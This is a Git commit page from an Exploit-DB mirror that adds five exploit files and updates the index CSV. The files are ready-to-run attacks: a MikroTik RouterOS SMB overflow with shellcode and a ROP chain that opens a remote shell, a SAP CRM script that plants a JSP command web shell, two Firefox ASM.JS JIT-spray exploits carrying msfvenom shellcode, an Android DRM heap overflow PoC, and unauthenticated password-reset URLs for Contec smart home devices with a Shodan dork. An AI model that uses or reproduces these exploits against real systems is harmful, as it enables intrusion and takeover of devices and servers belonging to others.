bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-03-17

Browse source 
6 changes to exploits/shellcodes

Android DRM Services - Buffer Overflow
MikroTik RouterOS < 6.41.3/6.42rc27 - SMB Buffer Overflow
SAP NetWeaver AS JAVA CRM -  Log injection Remote Command Execution
Firefox 46.0.1 - ASM.JS JIT-Spray Remote Code Execution
Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution

Spring Data REST < 2.6.9 (Ingalls SR9)_ 3.0.1 (Kay SR1) - PATCH Request Remote Code Execution
Spring Data REST < 2.6.9 (Ingalls SR9) / 3.0.1 (Kay SR1) - PATCH Request Remote Code Execution
Contec Smart Home 4.15 - Unauthorized Password Reset
This commit is contained in:
Offensive Security 2018-03-17 05:01:46 +00:00
parent 80a6e65803
commit b0fc7bfd43
7 changed files with 700 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

95
exploits/android/dos/44291.cpp Normal file
View file

@ -0,0 +1,95 @@
#include <utils/StrongPointer.h>
#include <binder/IServiceManager.h>
#include <binder/MemoryHeapBase.h>
#include <binder/MemoryBase.h>
#include <binder/IMemory.h>
#include <media/ICrypto.h>
#include <media/IMediaDrmService.h>
#include <media/hardware/CryptoAPI.h>
#include <stdio.h>
#include <unistd.h>
using namespace android;
static sp<ICrypto> getCrypto()
{
sp<IServiceManager> sm = defaultServiceManager();
sp<IBinder> binder = sm->getService(String16("media.drm"));
sp<IMediaDrmService> service = interface_cast<IMediaDrmService>(binder);
if (service == NULL) {
fprintf(stderr, "Failed to retrieve 'media.drm' service.\n");
return NULL;
}
sp<ICrypto> crypto = service->makeCrypto();
if (crypto == NULL) {
fprintf(stderr, "makeCrypto failed.\n");
return NULL;
}
return crypto;
}
static bool setClearKey(sp<ICrypto> crypto)
{
// A UUID which identifies the ClearKey DRM scheme.
const uint8_t clearkey_uuid[16] = {
0x10, 0x77, 0xEF, 0xEC, 0xC0, 0xB2, 0x4D, 0x02,
0xAC, 0xE3, 0x3C, 0x1E, 0x52, 0xE2, 0xFB, 0x4B
};
if (crypto->createPlugin(clearkey_uuid, NULL, 0) != OK) {
fprintf(stderr, "createPlugin failed.\n");
return false;
}
return true;
}
#define DATA_SIZE (0x2000)
#define DEST_OFFSET (1)
static void executeOverflow()
{
// Get an interface to a remote CryptoHal object.
sp<ICrypto> crypto = getCrypto();
if (crypto == NULL) {
return;
}
if (!setClearKey(crypto)) {
return;
}
// From here we're done with the preparations and go into the
// vulnerability PoC.
sp<MemoryHeapBase> heap = new MemoryHeapBase(DATA_SIZE);
// This line is to merely show that we have full control over the data
// written in the overflow.
memset(heap->getBase(), 'A', DATA_SIZE);
sp<MemoryBase> sourceMemory = new MemoryBase(heap, 0, DATA_SIZE);
sp<MemoryBase> destMemory = new MemoryBase(heap, DATA_SIZE - DEST_OFFSET,
DEST_OFFSET);
int heapSeqNum = crypto->setHeap(heap);
if (heapSeqNum < 0) {
fprintf(stderr, "setHeap failed.\n");
return;
}
CryptoPlugin::Pattern pattern = { .mEncryptBlocks = 0, .mSkipBlocks = 1 };
ICrypto::SourceBuffer source = { .mSharedMemory = sourceMemory,
.mHeapSeqNum = heapSeqNum };
// mNumBytesOfClearData is the actual size of data to be copied.
CryptoPlugin::SubSample subSamples[] = { {
.mNumBytesOfClearData = DATA_SIZE, .mNumBytesOfEncryptedData = 0 } };
ICrypto::DestinationBuffer destination = {
.mType = ICrypto::kDestinationTypeSharedMemory, .mHandle = NULL,
.mSharedMemory = destMemory };
printf("decrypt result = %zd\n", crypto->decrypt(NULL, NULL,
CryptoPlugin::kMode_Unencrypted, pattern, source, 0, subSamples,
ARRAY_SIZE(subSamples), destination, NULL));
}
int main() {
executeOverflow();
return 0;
}

90
exploits/hardware/remote/44290.py Executable file
View file

@ -0,0 +1,90 @@
#!/usr/bin/env python
import socket
import struct
import sys
import telnetlib
NETBIOS_SESSION_MESSAGE = "\x00"
NETBIOS_SESSION_REQUEST = "\x81"
NETBIOS_SESSION_FLAGS = "\x00"
# trick from http://shell-storm.org/shellcode/files/shellcode-881.php
# will place the socket file descriptor in eax
find_sock_fd = "\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48"
# dup stdin-stdout-stderr so we can reuse the existing connection
dup_fds = "\x89\xc3\xb1\x02\xb0\x3f\xcd\x80\x49\x79\xf9"
# execve - cannot pass the 2nd arg as NULL or busybox will complain
execve_bin_sh = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
# build shellcode
shellcode = find_sock_fd + dup_fds + execve_bin_sh
# rop to mprotect and make the heap executable
# the heap base is not being subject to ASLR for whatever reason, so let's take advantage of it
p = lambda x : struct.pack('I', x)
rop = ""
rop += p(0x0804c39d) # 0x0804c39d: pop ebx; pop ebp; ret;
rop += p(0x08072000) # ebx -> heap base
rop += p(0xffffffff) # ebp -> gibberish
rop += p(0x080664f5) # 0x080664f5: pop ecx; adc al, 0xf7; ret;
rop += p(0x14000) # ecx -> size for mprotect
rop += p(0x08066f24) # 0x08066f24: pop edx; pop edi; pop ebp; ret;
rop += p(0x00000007) # edx -> permissions for mprotect -> PROT_READ | PROT_WRITE | PROT_EXEC
rop += p(0xffffffff) # edi -> gibberish
rop += p(0xffffffff) # ebp -> gibberish
rop += p(0x0804e30f) # 0x0804e30f: pop ebp; ret;
rop += p(0x0000007d) # ebp -> mprotect system call
rop += p(0x0804f94a) # 0x0804f94a: xchg eax, ebp; ret;
rop += p(0xffffe42e) # 0xffffe42e; int 0x80; pop ebp; pop edx; pop ecx; ret - from vdso - not affected by ASLR
rop += p(0xffffffff) # ebp -> gibberish
rop += p(0x0) # edx -> zeroed out
rop += p(0x0) # ecx -> zeroed out
rop += p(0x0804e30f) # 0x0804e30f: pop ebp; ret;
rop += p(0x08075802) # ebp -> somewhere on the heap that will (always?) contain user controlled data
rop += p(0x0804f94a) # 0x0804f94a: xchg eax, ebp; ret;
rop += p(0x0804e153) # jmp eax; - jump to our shellcode on the heap
offset_to_regs = 83
# we do not really care about the initial register values other than overwriting the saved ret address
ebx = p(0x45454545)
esi = p(0x45454545)
edi = p(0x45454545)
ebp = p(0x45454545)
eip = p(0x0804886c) # 0x0804886c: ret;
payload = "\xff" * offset_to_regs + ebx + esi + edi + ebp + eip + rop
header = struct.pack("!ccH", NETBIOS_SESSION_REQUEST, NETBIOS_SESSION_FLAGS, len(payload))
buf = header + payload
def open_connection(ip):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, 139))
return s
def store_payload(s):
print "[+] storing payload on the heap"
s.send((NETBIOS_SESSION_MESSAGE + "\x00\xeb\x02") * 4000 + "\x90" * 16 + shellcode)
def crash_smb(s):
print "[+] getting code execution"
s.send(buf)
if __name__ == "__main__":
if len(sys.argv) != 2:
print "%s ip" % sys.argv[0]
sys.exit(1)
s = open_connection(sys.argv[1])
store_payload(s)
# the server closes the first connection, so we need to open another one
t = telnetlib.Telnet()
t.sock = open_connection(sys.argv[1])
crash_smb(t.sock)
print "[+] got shell?"
t.interact()

30
exploits/hardware/webapps/44295.txt Normal file
View file

@ -0,0 +1,30 @@
# Title : Contec smart home 4.15 Unauthorized Password Reset
# Shodan Dork : "content/smarthome.php"
# Vendor Homepage : http://contec.co.il
# Tested on : Google Chrome
# Tested version : 4.15
# Date : 2018-03-14
# Author : Z3ro0ne
# Contact : saadousfar59@gmail.com
# Facebook Page : https://www.facebook.com/Z3ro0ne
# Vulnerability description :
the Vulnerability allow unauthenticated attacker to remotely bypass authentication and change admin password without old password and control (lamps,doors,air conditioner...)
# Exploit
To Reset Admin password
http://Ipaddress:port/content/new_user.php?user_name=ADMIN&password=NEWPASSWORD&group_id=1
To Create a new user
http://Ipaddress:port/content/new_user.php?user_name=NEWUSER&password=NEWPASSWORD&group_id=1
To edit a user
http://Ipaddress:port/content/edit_user.php?user_name=USER&password=NEWPASSWORD&group_id=1
To Delete a user
http://Ipaddress:port/content/delete_user.php?user_name=USER
Users list
http://Ipaddress:port/content/user.php

141
exploits/windows/remote/44292.py Executable file
View file

@ -0,0 +1,141 @@
#!/usr/bin/env python
import argparse
import urllib
import requests, random
from bs4 import BeautifulSoup
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
help_desc = '''
PoC of Remote Command Execution via Log injection on SAP CRM
-- ERPScan
python crm_rce.py --ssl --host 127.0.0.1 --port 50000 --username administrator --password 06071992 --SID DM0 --ssl true
'''
baner = '''
_______ _______ _______ _______ _______ _______ _
( ____ \( ____ )( ____ )( ____ \( ____ \( ___ )( ( /|
| ( \/| ( )|| ( )|| ( \/| ( \/| ( ) || \ ( |
| (__ | (____)|| (____)|| (_____ | | | (___) || \ | |
| __) | __)| _____)(_____ )| | | ___ || (\ \) |
| ( | (\ ( | ( ) || | | ( ) || | \ |
| (____/\| ) \ \__| ) /\____) || (____/\| ) ( || ) \ |
(_______/|/ \__/|/ \_______)(_______/|/ \||/ )_)
Vahagn @vah_13 Vardanian
Bob @NewFranny
CVE-2018-2380
'''
def start(ip, port, username, password, sid, ssl):
if ssl == None:
base_scheme = 'http'
else:
base_scheme = 'https'
req_adapter = requests.session()
_server_ip_port = "{0}:{1}".format(ip, port)
_username = username
admin_password = password
_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Referer": "{0}://{1}/b2b/admin/logging.jsp?location=com.sap.isa&mode=edit&index=1".format(
base_scheme,_server_ip_port)
}
# shell name
_shell_name = "ERPScan_shell_{0}".format(random.randint(1337, 31337))
# shell_code
shell_code = '''
<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
'''
# urls variables
_irj_portal = "{0}://{1}/irj/portal".format(base_scheme,_server_ip_port)
_b2b_admin_url = "{0}://{1}/b2b/admin/index.jsp".format(base_scheme,_server_ip_port)
_url_of_log_path = "{0}://{1}/b2b/admin/logging.jsp".format(base_scheme,_server_ip_port)
_url_write_shell_to_log_file = "{0}://{1}/b2b/init.do?\"%22]{2}[%22\"".format(base_scheme,_server_ip_port,urllib.quote_plus(shell_code))
# data variable
_post_data_restore_log_path = {"selConfigName": "com.sap.isa",
"selSeverity": "0",
"selDest": "./default_log_name.log",
"selLimit": "10485760",
"selCount": "20",
"selFormatterType": "ListFormat",
"selPattern": "none",
"mode": "save",
"selLocationIdx": "1"}
_post_data_to_change_log_path = {"selConfigName": "com.sap.isa",
"selSeverity": "0",
"selDest": "C:\\usr\\sap\\{0}\\J00\\j2ee\\cluster\\apps\\sap.com\\com.sap.engine.docs.examples\\servlet_jsp\\_default\\root\\{1}.jsp".format(sid, _shell_name),
"selLimit": "10485760",
"selCount": "20",
"selFormatterType": "ListFormat",
"selPattern": "none",
"mode": "save",
"selLocationIdx": "1"}
print("{0} \n[!] Try to get RCE using log injection ".format(baner))
print("[!] Get j_salt token for requests")
res = requests.get(_irj_portal, headers=_headers, verify=False)
soup = BeautifulSoup(res.text, "html.parser")
e = soup.find("input", {"name": "j_salt"})
__j_salt = e['value']
print("[!] Login to the SAP portal")
req_adapter.post(_b2b_admin_url,
headers=_headers,
data={"login_submit": "on", "login_do_redirect": "1", "j_salt": __j_salt,
"j_username": "{0}".format(_username), "j_password": "{0}".format(admin_password),
"uidPasswordLogon": "Log On"}, verify=False)
print("[!] Change log path ")
req_adapter.post(_url_of_log_path, headers=_headers, data=_post_data_to_change_log_path)
print("[!] Upload \"Runtime.getRuntime().exec(request.getParameter(\"cmd\")) \" shell to {0}://{1}/{2}.0.jsp?cmd=ipconfig".format(base_scheme,_server_ip_port, _shell_name))
req_adapter.get(_url_write_shell_to_log_file, headers=_headers)
print("[!] Restore logs path to ./default_log_name.log")
req_adapter.post(_url_of_log_path, headers=_headers, data=_post_data_restore_log_path)
print("[!] Enjoy!")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description=help_desc, formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('-H', '--host', default='127.0.0.1', help='SAP host to send requests to')
parser.add_argument('-p', '--port', default=50000, type=int, help='SAP host port')
parser.add_argument('-u', '--username', help='SAP CRM administrator')
parser.add_argument('-pwd', '--password', help='SAP CRM administrator password')
parser.add_argument('-s', '--SID', help='SAP SID')
parser.add_argument('-S', '--ssl', help='Use ssl connection')
args = parser.parse_args()
args_dict = vars(args)
host = args_dict['host']
port = args_dict['port']
username = args_dict['username']
password = args_dict['password']
sid = args_dict['SID']
ssl = args.ssl
start(host, port, username, password, sid, ssl)

165
exploits/windows/remote/44293.html Normal file
View file

@ -0,0 +1,165 @@
<!DOCTYPE HTML>
<!--
FULL ASLR AND DEP BYPASS USING ASM.JS JIT SPRAY (CVE-2017-5375)
*PoC* Exploit against Firefox 46.0.1 (CVE-2016-2819)
ASM.JS float constant pool JIT-Spray special shown at OffensiveCon 2018
Tested on:
Firefox 46.0.1 32-bit - Windows 10 1709
https://ftp.mozilla.org/pub/firefox/releases/46.0.1/win32/en-US/Firefox%20Setup%2046.0.1.exe
Howto:
1) serve PoC over network and open it in Firefox 46.0.1 32-bit
2) A successfull exploit attempt should pop calc.exe
Mozilla Bug Report:
https://bugzilla.mozilla.org/show_bug.cgi?id=1270381
Writeup:
https://rh0dev.github.io/blog/2018/more-on-asm-dot-js-payloads-and-exploitation/
- For research purposes only -
(C) Rh0
Mar. 13, 2018
-->
<title>CVE-2016-2819 and ASM.JS JIT-Spray</title>
<head>
<meta charset=UTF-8 />
<script>
"use strict"
var Exploit = function(){
this.asmjs = new Asmjs()
this.heap = new Heap()
}
Exploit.prototype.go = function(){
/* target address of fake node object */
var node_target_addr = 0x5a500000
/* target address of asm.js float pool payload*/
var target_eip = 0x20200b58
/* spray asm.js float constant pools */
this.asmjs.spray_float_payload(0x1000)
/* spray fake Node objects */
this.heap.spray(node_target_addr, target_eip)
/* go! */
this.trigger_vuln(node_target_addr)
};
Exploit.prototype.trigger_vuln = function(node_ptr){
document.body.innerHTML = '<table><svg><div id="BBBB">'
this.heap.gc()
var a = new Array()
for (var i=0; i < 0x10100; i++){
/* array element (Node object ptr) control with integer underflow */
a[i] = new Uint32Array(0x100/4)
for (var j=0; j<0x100/4; j++)
a[i][j] = node_ptr
}
/* original crashing testcase
document.getElementById('BBBB').outerHTML = '<tr><title><ruby><template><table><template><td><col><em><table></tr><th></tr></td></table>hr {}</style>'
*/
/* easier to exploit codepath */
document.getElementById('BBBB').outerHTML = '<tr><title><ruby><template><table><template><td><col><em><table></tr><th></tr></td></table>hr {}<DD>'
window.location.reload()
};
var Asmjs = function(){};
Asmjs.prototype.asm_js_module = function(stdlib, ffi){
"use asm"
var foo = ffi.foo
function payload(){
var val = 0.0
/* Fx 46.0.1 float constant pool of size 0xc0 is at 0xXXXX0b58*/
val = +foo(
// $ msfvenom --payload windows/exec CMD=calc.exe # transformed with sc2asmjs.py
-1.587865768352248e-263,
-8.692422460804815e-255,
7.529882109376901e-114,
2.0120602207293977e-16,
3.7204662687249914e-242,
4.351158092040946e+89,
2.284741716118451e+270,
7.620699014501263e-153,
5.996021286047645e+44,
-5.981935902612295e-92,
6.23540918304361e+259,
1.9227873281657598e+256,
2.0672493951546363e+187,
-6.971032919585734e+91,
5.651413300798281e-134,
-1.9040061366251406e+305,
-1.2687640718807038e-241,
9.697849844423e-310,
-2.0571400761625145e+306,
-1.1777948610587587e-123,
2.708909852013898e+289,
3.591750823735296e+37,
-1.7960516725035723e+106,
6.326776523166028e+180
)
return +val;
}
return payload
};
Asmjs.prototype.spray_float_payload = function(regions){
this.modules = new Array(regions).fill(null).map(
region => this.asm_js_module(window, {foo: () => 0})
)
};
var Heap = function(target_addr, eip){
this.node_heap = []
};
Heap.prototype.spray = function(node_target_addr, target_eip){
var junk = 0x13371337
var current_address = 0x20000000
var block_size = 0x1000000
while(current_address < node_target_addr){
var fake_objects = new Uint32Array(block_size/4 - 0x100)
for (var offset = 0; offset < block_size; offset += 0x100000){
/* target Node object needed to control EIP */
fake_objects[offset/4 + 0x00/4] = 0x29
fake_objects[offset/4 + 0x0c/4] = 3
fake_objects[offset/4 + 0x14/4] = node_target_addr + 0x18
fake_objects[offset/4 + 0x18/4] = 1
fake_objects[offset/4 + 0x1c/4] = junk
fake_objects[offset/4 + 0x20/4] = node_target_addr + 0x24
fake_objects[offset/4 + 0x24/4] = node_target_addr + 0x28
fake_objects[offset/4 + 0x28/4] = node_target_addr + 0x2c
fake_objects[offset/4 + 0x2c/4] = target_eip
}
this.node_heap.push(fake_objects)
current_address += block_size
}
};
Heap.prototype.gc = function(){
for (var i=0; i<=10; i++)
var x = new ArrayBuffer(0x1000000)
};
</script>
<head>
<body onload='exploit = new Exploit(); exploit.go()' />

172
exploits/windows/remote/44294.html Normal file
View file

@ -0,0 +1,172 @@
<!DOCTYPE HTML>
<!--
FULL ASLR AND DEP BYPASS USING ASM.JS JIT SPRAY (CVE-2017-5375)
*PoC* Exploit against Firefox 44.0.2 (CVE-2016-1960)
ASM.JS float constant pool JIT-Spray special shown at OffensiveCon 2018
Tested on:
Firefox 44.0.2 32-bit - Windows 10 1709
https://ftp.mozilla.org/pub/firefox/releases/44.0.2/win32/en-US/Firefox%20Setup%2044.0.2.exe
Howto:
1) serve PoC over network and open it in Firefox 44.0.2 32-bit
2) A successfull exploit attempt should pop calc.exe
Mozilla Bug Report:
https://bugzilla.mozilla.org/show_bug.cgi?id=1246014
Writeup:
https://rh0dev.github.io/blog/2018/more-on-asm-dot-js-payloads-and-exploitation/
- For research purposes only -
(C) Rh0
Mar. 13, 2018
Notes:
*) very similar to CVE-2016-2819, but still different:
*) this PoC (CVE-2016-1960) does trigger in 44.0.2 but not in 46.0.1
because in 46.0.1 it is already fixed.
*) CVE-2016-2819 does trigger the same bug in 44.0.2 and 46.0.1 because it
was fixed in Firefox > 46.0.1
-->
<title>CVE-2016-1960 and ASM.JS JIT-Spray</title>
<head>
<meta charset=UTF-8 />
<script>
"use strict"
var Exploit = function(){
this.asmjs = new Asmjs()
this.heap = new Heap()
}
Exploit.prototype.go = function(){
/* target address of fake node object */
var node_target_addr = 0x20200000
/* target address of asm.js float pool payload*/
var target_eip = 0x3c3c1dc8
/* spray fake Node objects */
this.heap.spray(node_target_addr, target_eip)
/* spray asm.js float constant pools */
this.asmjs.spray_float_payload(0x1800)
/* go! */
this.trigger_vuln(node_target_addr)
};
Exploit.prototype.trigger_vuln = function(node_ptr){
document.body.innerHTML = '<table><svg><div id="AAAA">'
this.heap.gc()
var a = new Array()
for (var i=0; i < 0x11000; i++){
/* array element (Node object ptr) control with integer underflow */
a[i] = new Uint32Array(0x100/4)
for (var j=0; j<0x100/4; j++)
a[i][j] = node_ptr
}
/* original crashing testcase
document.getElementById('AAAA').innerHTML = '<title><template><td><tr><title><i></tr><style>td</style>';
*/
/* easier to exploit codepath */
document.getElementById('AAAA').innerHTML = '<title><template><td><tr><title><i></tr><style>td<DD>';
window.location.reload()
};
var Asmjs = function(){};
Asmjs.prototype.asm_js_module = function(stdlib, ffi){
"use asm"
var foo = ffi.foo
function payload(){
var val = 0.0
/* Fx 44.0.2 float constant pool of size 0xc0 is at 0xXXXX1dc8*/
val = +foo(
// $ msfvenom --payload windows/exec CMD=calc.exe # transformed with sc2asmjs.py
-1.587865768352248e-263,
-8.692422460804815e-255,
7.529882109376901e-114,
2.0120602207293977e-16,
3.7204662687249914e-242,
4.351158092040946e+89,
2.284741716118451e+270,
7.620699014501263e-153,
5.996021286047645e+44,
-5.981935902612295e-92,
6.23540918304361e+259,
1.9227873281657598e+256,
2.0672493951546363e+187,
-6.971032919585734e+91,
5.651413300798281e-134,
-1.9040061366251406e+305,
-1.2687640718807038e-241,
9.697849844423e-310,
-2.0571400761625145e+306,
-1.1777948610587587e-123,
2.708909852013898e+289,
3.591750823735296e+37,
-1.7960516725035723e+106,
6.326776523166028e+180
)
return +val;
}
return payload
};
Asmjs.prototype.spray_float_payload = function(regions){
this.modules = new Array(regions).fill(null).map(
region => this.asm_js_module(window, {foo: () => 0})
)
};
var Heap = function(target_addr, eip){
this.node_heap = []
};
Heap.prototype.spray = function(node_target_addr, target_eip){
var junk = 0x13371337
var current_address = 0x08000000
var block_size = 0x1000000
while(current_address < node_target_addr){
var fake_objects = new Uint32Array(block_size/4 - 0x100)
for (var offset = 0; offset < block_size; offset += 0x100000){
/* target Node object needed to control EIP */
fake_objects[offset/4 + 0x00/4] = 0x29
fake_objects[offset/4 + 0x0c/4] = 3
fake_objects[offset/4 + 0x14/4] = node_target_addr + 0x18
fake_objects[offset/4 + 0x18/4] = 1
fake_objects[offset/4 + 0x1c/4] = junk
fake_objects[offset/4 + 0x20/4] = node_target_addr + 0x24
fake_objects[offset/4 + 0x24/4] = node_target_addr + 0x28
fake_objects[offset/4 + 0x28/4] = node_target_addr + 0x2c
fake_objects[offset/4 + 0x2c/4] = target_eip
}
this.node_heap.push(fake_objects)
current_address += block_size
}
};
Heap.prototype.gc = function(){
for (var i=0; i<=10; i++)
var x = new ArrayBuffer(0x1000000)
};
</script>
<head>
<body onload='exploit = new Exploit(); exploit.go()' />

8
files_exploits.csv
View file

@ -5900,6 +5900,7 @@ id,file,description,date,author,type,platform,port
44265,exploits/linux/dos/44265.py,"Memcached 1.5.5 - 'Memcrashed ' Insufficient Control of Network Message Volume Denial of Service With Shodan API",2018-03-08,649,dos,linux,11211
44268,exploits/android/dos/44268.txt,"Broadcom BCM43xx Wi-Fi - 'BroadPWN' Denial of Service",2016-12-01,649,dos,android,
44271,exploits/windows/dos/44271.py,"WebLog Expert Enterprise 9.4 - Denial of Service",2018-03-09,hyp3rlinx,dos,windows,
44291,exploits/android/dos/44291.cpp,"Android DRM Services - Buffer Overflow",2018-03-15,"Tamir Zahavi-Brunner",dos,android,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -16324,6 +16325,10 @@ id,file,description,date,author,type,platform,port
44280,exploits/multiple/remote/44280.rb,"Eclipse Equinoxe OSGi Console - Command Execution (Metasploit)",2018-03-12,Metasploit,remote,multiple,
44283,exploits/hardware/remote/44283.py,"MikroTik RouterOS < 6.38.4 (MIPSBE) - 'Chimay Red' Stack Clash Remote Code Execution",2018-03-12,"Lorenzo Santina",remote,hardware,
44284,exploits/hardware/remote/44284.py,"MikroTik RouterOS < 6.38.4 (x86) - 'Chimay Red' Stack Clash Remote Code Execution",2018-03-12,"Lorenzo Santina",remote,hardware,
44290,exploits/hardware/remote/44290.py,"MikroTik RouterOS < 6.41.3/6.42rc27 - SMB Buffer Overflow",2018-03-15,CoreLabs,remote,hardware,
44292,exploits/windows/remote/44292.py,"SAP NetWeaver AS JAVA CRM - Log injection Remote Command Execution",2018-03-14,"erp scan team",remote,windows,
44293,exploits/windows/remote/44293.html,"Firefox 46.0.1 - ASM.JS JIT-Spray Remote Code Execution",2018-03-16,Rh0,remote,windows,
44294,exploits/windows/remote/44294.html,"Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution",2018-03-16,Rh0,remote,windows,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -39001,4 +39006,5 @@ id,file,description,date,author,type,platform,port
44285,exploits/aspx/webapps/44285.txt,"SecurEnvoy SecurMail 9.1.501 - Multiple Vulnerabilities",2018-03-13,"SEC Consult",webapps,aspx,
44286,exploits/php/webapps/44286.txt,"Tuleap 9.17.99.189 - Blind SQL Injection",2018-03-13,"Cristiano Maruti",webapps,php,
44288,exploits/php/webapps/44288.txt,"WordPress Plugin Duplicator 1.2.32 - Cross-Site Scripting",2018-03-15,"Stefan Broeder",webapps,php,80
44289,exploits/java/webapps/44289.java,"Spring Data REST < 2.6.9 (Ingalls SR9)_ 3.0.1 (Kay SR1) - PATCH Request Remote Code Execution",2018-03-15,"Antonio Francesco Sardella",webapps,java,
44289,exploits/java/webapps/44289.java,"Spring Data REST < 2.6.9 (Ingalls SR9) / 3.0.1 (Kay SR1) - PATCH Request Remote Code Execution",2018-03-15,"Antonio Francesco Sardella",webapps,java,
44295,exploits/hardware/webapps/44295.txt,"Contec Smart Home 4.15 - Unauthorized Password Reset",2018-03-16,Z3ro0ne,webapps,hardware,

Can't render this file because it is too large.